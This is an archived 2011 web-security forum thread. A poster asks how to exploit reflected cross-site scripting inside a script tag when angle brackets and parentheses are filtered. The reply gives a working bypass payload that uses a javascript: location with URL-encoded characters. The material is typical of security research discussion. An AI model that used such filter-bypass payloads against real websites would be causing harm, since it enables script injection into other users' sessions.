Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
xss in script tag without ( and )
Posted by: joel
Date: September 27, 2011 12:10AM

hi, all

I just found a XSS, which will reflect the argument of url inside the script tag, but the <, >, (, ) would be filtered

For example:
/ref.php?name=";SOME_CODE_HERE;//

The source code of the page is:
<script>
...
name="";SOME_CODE;//
...
</script>

When I try

name=";alert(1);//

It show me:
<script>
...
name="";alert1;//
...
</script>

Can this page be xssed?

Thanks in advance.

Options: ReplyQuote
Re: xss in script tag without ( and )
Posted by: Gareth Heyes
Date: September 27, 2011 08:29AM

";location="javascript:%61%6c%65%72%74%28%31%29";//

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 09/27/2011 08:31AM by Gareth Heyes.

Options: ReplyQuote


Sorry, only registered users may post in this forum.